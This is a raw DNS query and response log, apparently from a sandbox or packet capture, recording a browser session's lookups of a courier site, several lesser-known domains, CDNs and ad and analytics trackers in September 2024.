            Sep 27, 2024 02:30:48.578375101 CEST192.168.2.61.1.1.10x1d08Standard query (0)unpkg.com65IN (0x0001)false
            Sep 27, 2024 02:30:49.646802902 CEST192.168.2.61.1.1.10x704fStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:49.647051096 CEST192.168.2.61.1.1.10xabddStandard query (0)connect.facebook.net65IN (0x0001)false
            Sep 27, 2024 02:30:50.913707018 CEST192.168.2.61.1.1.10x8c59Standard query (0)js.hs-scripts.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:50.913957119 CEST192.168.2.61.1.1.10xea37Standard query (0)js.hs-scripts.com65IN (0x0001)false
            Sep 27, 2024 02:30:51.567945957 CEST192.168.2.61.1.1.10x5ff6Standard query (0)static.hotjar.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.568109989 CEST192.168.2.61.1.1.10x52ecStandard query (0)static.hotjar.com65IN (0x0001)false
            Sep 27, 2024 02:30:51.655875921 CEST192.168.2.61.1.1.10xeb6Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.656419992 CEST192.168.2.61.1.1.10x27c4Standard query (0)analytics.google.com65IN (0x0001)false
            Sep 27, 2024 02:30:51.673929930 CEST192.168.2.61.1.1.10xc5ffStandard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.674201965 CEST192.168.2.61.1.1.10x45b0Standard query (0)td.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:51.949323893 CEST192.168.2.61.1.1.10x50abStandard query (0)js.hs-scripts.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:51.949465036 CEST192.168.2.61.1.1.10xaeb4Standard query (0)js.hs-scripts.com65IN (0x0001)false
            Sep 27, 2024 02:30:52.674385071 CEST192.168.2.61.1.1.10xd10bStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.674928904 CEST192.168.2.61.1.1.10x4a02Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:52.677776098 CEST192.168.2.61.1.1.10xcb07Standard query (0)static.hotjar.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:52.678081036 CEST192.168.2.61.1.1.10x51d9Standard query (0)static.hotjar.com65IN (0x0001)false
            Sep 27, 2024 02:30:53.954533100 CEST192.168.2.61.1.1.10xfa16Standard query (0)js.hs-banner.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:53.954785109 CEST192.168.2.61.1.1.10x65b9Standard query (0)js.hs-banner.com65IN (0x0001)false
            Sep 27, 2024 02:30:53.970336914 CEST192.168.2.61.1.1.10xe208Standard query (0)js.hs-analytics.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:53.970501900 CEST192.168.2.61.1.1.10x57a5Standard query (0)js.hs-analytics.net65IN (0x0001)false
            Sep 27, 2024 02:30:54.003705978 CEST192.168.2.61.1.1.10xccb7Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.004420042 CEST192.168.2.61.1.1.10x919cStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:54.086546898 CEST192.168.2.61.1.1.10x57e2Standard query (0)js.hscollectedforms.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.086738110 CEST192.168.2.61.1.1.10x17a8Standard query (0)js.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:54.108292103 CEST192.168.2.61.1.1.10xc07bStandard query (0)script.hotjar.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.108814001 CEST192.168.2.61.1.1.10xf97bStandard query (0)script.hotjar.com65IN (0x0001)false
            Sep 27, 2024 02:30:54.111921072 CEST192.168.2.61.1.1.10xc06Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.112051964 CEST192.168.2.61.1.1.10xb8f5Standard query (0)www.google.com65IN (0x0001)false
            Sep 27, 2024 02:30:54.114371061 CEST192.168.2.61.1.1.10xcf4dStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.114581108 CEST192.168.2.61.1.1.10x7a1cStandard query (0)www.facebook.com65IN (0x0001)false
            Sep 27, 2024 02:30:54.978916883 CEST192.168.2.61.1.1.10x5bfcStandard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:54.979070902 CEST192.168.2.61.1.1.10x2544Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.055597067 CEST192.168.2.61.1.1.10xae5Standard query (0)forms.hscollectedforms.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.055816889 CEST192.168.2.61.1.1.10x7e0aStandard query (0)forms.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.076579094 CEST192.168.2.61.1.1.10x5e33Standard query (0)js.hs-analytics.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.076982021 CEST192.168.2.61.1.1.10x1c38Standard query (0)js.hs-analytics.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.078084946 CEST192.168.2.61.1.1.10x9e49Standard query (0)js.hs-banner.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.078325033 CEST192.168.2.61.1.1.10x95f5Standard query (0)js.hs-banner.com65IN (0x0001)false
            Sep 27, 2024 02:30:55.079567909 CEST192.168.2.61.1.1.10x7c2cStandard query (0)js.hscollectedforms.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.079758883 CEST192.168.2.61.1.1.10x9234Standard query (0)js.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:55.228744984 CEST192.168.2.61.1.1.10xd552Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.229306936 CEST192.168.2.61.1.1.10xc5dStandard query (0)www.google.com65IN (0x0001)false
            Sep 27, 2024 02:30:55.774122953 CEST192.168.2.61.1.1.10xb8fbStandard query (0)forms.hsforms.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:55.774290085 CEST192.168.2.61.1.1.10x9a92Standard query (0)forms.hsforms.com65IN (0x0001)false
            Sep 27, 2024 02:30:56.360030890 CEST192.168.2.61.1.1.10xe17aStandard query (0)forms.hscollectedforms.netA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.360141039 CEST192.168.2.61.1.1.10x984Standard query (0)forms.hscollectedforms.net65IN (0x0001)false
            Sep 27, 2024 02:30:56.707313061 CEST192.168.2.61.1.1.10x512bStandard query (0)forms.hsforms.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:56.707674980 CEST192.168.2.61.1.1.10x9488Standard query (0)forms.hsforms.com65IN (0x0001)false
            Sep 27, 2024 02:30:57.081298113 CEST192.168.2.61.1.1.10x5c51Standard query (0)track.hubspot.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:57.081432104 CEST192.168.2.61.1.1.10x7bb2Standard query (0)track.hubspot.com65IN (0x0001)false
            Sep 27, 2024 02:30:57.847151995 CEST192.168.2.61.1.1.10x80dbStandard query (0)track.hubspot.comA (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:57.847465038 CEST192.168.2.61.1.1.10xc5a7Standard query (0)track.hubspot.com65IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Sep 27, 2024 02:29:28.410617113 CEST1.1.1.1192.168.2.60xec45No error (0)qdjtq.com129.226.167.139A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:28.425671101 CEST1.1.1.1192.168.2.60xeea5Server failure (2)qdjtq.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:29:28.768939018 CEST1.1.1.1192.168.2.60x7916Server failure (2)qdjtq.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:29:31.037285089 CEST1.1.1.1192.168.2.60x6e51No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:31.037543058 CEST1.1.1.1192.168.2.60x56d9No error (0)www.google.com65IN (0x0001)false
            Sep 27, 2024 02:29:33.415163994 CEST1.1.1.1192.168.2.60x2c67Server failure (2)qdjtq.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:29:33.436371088 CEST1.1.1.1192.168.2.60x684eNo error (0)qdjtq.com129.226.167.139A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:33.829334974 CEST1.1.1.1192.168.2.60x7e25Server failure (2)qdjtq.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:29:40.102116108 CEST1.1.1.1192.168.2.60x8109No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:29:40.102116108 CEST1.1.1.1192.168.2.60x8109No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:43.531162024 CEST1.1.1.1192.168.2.60xcec9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:43.531162024 CEST1.1.1.1192.168.2.60xcec9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:55.825114965 CEST1.1.1.1192.168.2.60x275fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
            Sep 27, 2024 02:29:55.825114965 CEST1.1.1.1192.168.2.60x275fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:09.082386017 CEST1.1.1.1192.168.2.60xd3a4No error (0)www.servientrega.comwww.servientrega.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:09.976169109 CEST1.1.1.1192.168.2.60xfd27No error (0)www.servientrega.comwww.servientrega.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:12.911415100 CEST1.1.1.1192.168.2.60x14f4Server failure (2)www.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:13.982291937 CEST1.1.1.1192.168.2.60x295bServer failure (2)www.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:14.762058020 CEST1.1.1.1192.168.2.60xab66No error (0)www.servientrega.comwww.servientrega.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:16.254420042 CEST1.1.1.1192.168.2.60xa8eaNo error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:16.255728960 CEST1.1.1.1192.168.2.60xcfb2No error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:16.269668102 CEST1.1.1.1192.168.2.60x753fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:16.269668102 CEST1.1.1.1192.168.2.60x753fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:16.269668102 CEST1.1.1.1192.168.2.60x753fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:16.269668102 CEST1.1.1.1192.168.2.60x753fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.071624041 CEST1.1.1.1192.168.2.60xc296No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.071624041 CEST1.1.1.1192.168.2.60xc296No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.071624041 CEST1.1.1.1192.168.2.60xc296No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.071624041 CEST1.1.1.1192.168.2.60xc296No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.434721947 CEST1.1.1.1192.168.2.60x23faNo error (0)mobile.servientrega.com190.131.194.151A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:17.543171883 CEST1.1.1.1192.168.2.60x6e8No error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:17.543675900 CEST1.1.1.1192.168.2.60xe0e5No error (0)s.go-mpulse.netip46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:17.561713934 CEST1.1.1.1192.168.2.60x2cb2No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:17.561861038 CEST1.1.1.1192.168.2.60x6378No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:18.968921900 CEST1.1.1.1192.168.2.60x4946No error (0)mobile.servientrega.com190.131.194.151A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:18.969141006 CEST1.1.1.1192.168.2.60x1806Server failure (2)www.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:19.305762053 CEST1.1.1.1192.168.2.60x407fNo error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:19.306554079 CEST1.1.1.1192.168.2.60x7969No error (0)c.go-mpulse.netwildcard46.go-mpulse.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:19.467892885 CEST1.1.1.1192.168.2.60xdd97No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:19.467915058 CEST1.1.1.1192.168.2.60xaf1aNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:20.270251989 CEST1.1.1.1192.168.2.60x24cbServer failure (2)mobile.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:20.307497025 CEST1.1.1.1192.168.2.60xc38eNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:20.307924986 CEST1.1.1.1192.168.2.60xa1d9No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:21.282030106 CEST1.1.1.1192.168.2.60x7553Server failure (2)mobile.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:21.282866955 CEST1.1.1.1192.168.2.60x99e5No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:21.282866955 CEST1.1.1.1192.168.2.60x99e5No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
            Sep 27, 2024 02:30:21.282866955 CEST1.1.1.1192.168.2.60x99e5No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
            Sep 27, 2024 02:30:21.282973051 CEST1.1.1.1192.168.2.60x4e78No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:21.282973051 CEST1.1.1.1192.168.2.60x4e78No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:22.913665056 CEST1.1.1.1192.168.2.60x7b63No error (0)analytics.google.com172.217.18.14A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:22.981879950 CEST1.1.1.1192.168.2.60x9a95No error (0)td.doubleclick.net142.250.184.194A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.154444933 CEST1.1.1.1192.168.2.60xb8c2No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:24.154748917 CEST1.1.1.1192.168.2.60xb180No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:24.447668076 CEST1.1.1.1192.168.2.60x77cfNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:24.447668076 CEST1.1.1.1192.168.2.60x77cfNo error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.448074102 CEST1.1.1.1192.168.2.60xe0b2No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:24.825859070 CEST1.1.1.1192.168.2.60x7603No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:24.825859070 CEST1.1.1.1192.168.2.60x7603No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:24.826044083 CEST1.1.1.1192.168.2.60xe439No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:24.826044083 CEST1.1.1.1192.168.2.60xe439No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
            Sep 27, 2024 02:30:24.826044083 CEST1.1.1.1192.168.2.60xe439No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
            Sep 27, 2024 02:30:25.228435040 CEST1.1.1.1192.168.2.60x5a4No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:25.228435040 CEST1.1.1.1192.168.2.60x5a4No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:25.228688002 CEST1.1.1.1192.168.2.60x486No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:25.228688002 CEST1.1.1.1192.168.2.60x486No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:25.302978992 CEST1.1.1.1192.168.2.60xf05No error (0)mobile.servientrega.com190.131.194.151A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:25.697490931 CEST1.1.1.1192.168.2.60x5aa5No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:25.697678089 CEST1.1.1.1192.168.2.60xf371No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:26.291018963 CEST1.1.1.1192.168.2.60xa92fNo error (0)mobile.servientrega.com190.131.194.151A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:26.413336992 CEST1.1.1.1192.168.2.60x4e31No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:26.413367033 CEST1.1.1.1192.168.2.60x9cf6No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:26.413367033 CEST1.1.1.1192.168.2.60x9cf6No error (0)star-mini.c10r.facebook.com157.240.251.35A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:26.423048019 CEST1.1.1.1192.168.2.60x91b7No error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:26.423048019 CEST1.1.1.1192.168.2.60x91b7No error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:26.423238039 CEST1.1.1.1192.168.2.60x2d5bNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:26.423238039 CEST1.1.1.1192.168.2.60x2d5bNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:27.583952904 CEST1.1.1.1192.168.2.60xca41No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.50A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:27.583952904 CEST1.1.1.1192.168.2.60xca41No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.56A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:27.583952904 CEST1.1.1.1192.168.2.60xca41No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.116A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:27.583952904 CEST1.1.1.1192.168.2.60xca41No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.113A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:28.135921001 CEST1.1.1.1192.168.2.60x19d9Server failure (2)mobile.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:28.645536900 CEST1.1.1.1192.168.2.60xf802No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.56A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:28.645536900 CEST1.1.1.1192.168.2.60xf802No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.113A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:28.645536900 CEST1.1.1.1192.168.2.60xf802No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.116A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:28.645536900 CEST1.1.1.1192.168.2.60xf802No error (0)sth0d7m9clo4y72mjm8vh3.s.decidata.tv18.173.205.50A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:29.146682024 CEST1.1.1.1192.168.2.60x8052Server failure (2)mobile.servientrega.comnonenone65IN (0x0001)false
            Sep 27, 2024 02:30:29.953252077 CEST1.1.1.1192.168.2.60x56fcNo error (0)stats.g.doubleclick.net66.102.1.155A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:29.953252077 CEST1.1.1.1192.168.2.60x56fcNo error (0)stats.g.doubleclick.net66.102.1.154A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:29.953252077 CEST1.1.1.1192.168.2.60x56fcNo error (0)stats.g.doubleclick.net66.102.1.156A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:29.953252077 CEST1.1.1.1192.168.2.60x56fcNo error (0)stats.g.doubleclick.net66.102.1.157A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:30.051978111 CEST1.1.1.1192.168.2.60x4a3cNo error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:30.051978111 CEST1.1.1.1192.168.2.60x4a3cNo error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:30.052726030 CEST1.1.1.1192.168.2.60x5c23No error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:30.052726030 CEST1.1.1.1192.168.2.60x5c23No error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:39.533628941 CEST1.1.1.1192.168.2.60x8c92No error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:40.935549974 CEST1.1.1.1192.168.2.60xc869No error (0)uzer.co84.32.84.113A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.744590044 CEST1.1.1.1192.168.2.60x6390No error (0)owlcarousel2.github.io185.199.108.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.744590044 CEST1.1.1.1192.168.2.60x6390No error (0)owlcarousel2.github.io185.199.109.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.744590044 CEST1.1.1.1192.168.2.60x6390No error (0)owlcarousel2.github.io185.199.110.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.744590044 CEST1.1.1.1192.168.2.60x6390No error (0)owlcarousel2.github.io185.199.111.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.746165037 CEST1.1.1.1192.168.2.60xed0aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.746165037 CEST1.1.1.1192.168.2.60xed0aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.746165037 CEST1.1.1.1192.168.2.60xed0aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.746165037 CEST1.1.1.1192.168.2.60xed0aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.749324083 CEST1.1.1.1192.168.2.60x3a6bNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:41.750276089 CEST1.1.1.1192.168.2.60xf973No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:41.759967089 CEST1.1.1.1192.168.2.60xf282No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:41.760500908 CEST1.1.1.1192.168.2.60x4f56No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            Sep 27, 2024 02:30:41.760912895 CEST1.1.1.1192.168.2.60xf42eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.760912895 CEST1.1.1.1192.168.2.60xf42eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.761295080 CEST1.1.1.1192.168.2.60xc0d3No error (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 27, 2024 02:30:41.762693882 CEST1.1.1.1192.168.2.60xa07aNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.762693882 CEST1.1.1.1192.168.2.60xa07aNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.763953924 CEST1.1.1.1192.168.2.60x3f65No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
            Sep 27, 2024 02:30:41.768429995 CEST1.1.1.1192.168.2.60x9749No error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.768429995 CEST1.1.1.1192.168.2.60x9749No error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.768429995 CEST1.1.1.1192.168.2.60x9749No error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.768429995 CEST1.1.1.1192.168.2.60x9749No error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.768429995 CEST1.1.1.1192.168.2.60x9749No error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:41.769159079 CEST1.1.1.1192.168.2.60xf39fNo error (0)unpkg.com65IN (0x0001)false
            Sep 27, 2024 02:30:45.869122028 CEST1.1.1.1192.168.2.60xb1bcNo error (0)owlcarousel2.github.io185.199.108.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:45.869122028 CEST1.1.1.1192.168.2.60xb1bcNo error (0)owlcarousel2.github.io185.199.110.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:45.869122028 CEST1.1.1.1192.168.2.60xb1bcNo error (0)owlcarousel2.github.io185.199.111.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:45.869122028 CEST1.1.1.1192.168.2.60xb1bcNo error (0)owlcarousel2.github.io185.199.109.153A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:47.219862938 CEST1.1.1.1192.168.2.60xa86cNo error (0)uzer.co77.37.53.40A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:47.301510096 CEST1.1.1.1192.168.2.60x4ee6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:47.301510096 CEST1.1.1.1192.168.2.60x4ee6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:47.302422047 CEST1.1.1.1192.168.2.60xc252No error (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 27, 2024 02:30:48.584868908 CEST1.1.1.1192.168.2.60x1d08No error (0)unpkg.com65IN (0x0001)false
            Sep 27, 2024 02:30:48.584899902 CEST1.1.1.1192.168.2.60xc17aNo error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
            Sep 27, 2024 02:30:48.584899902 CEST1.1.1.1192.168.2.60xc17aNo error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
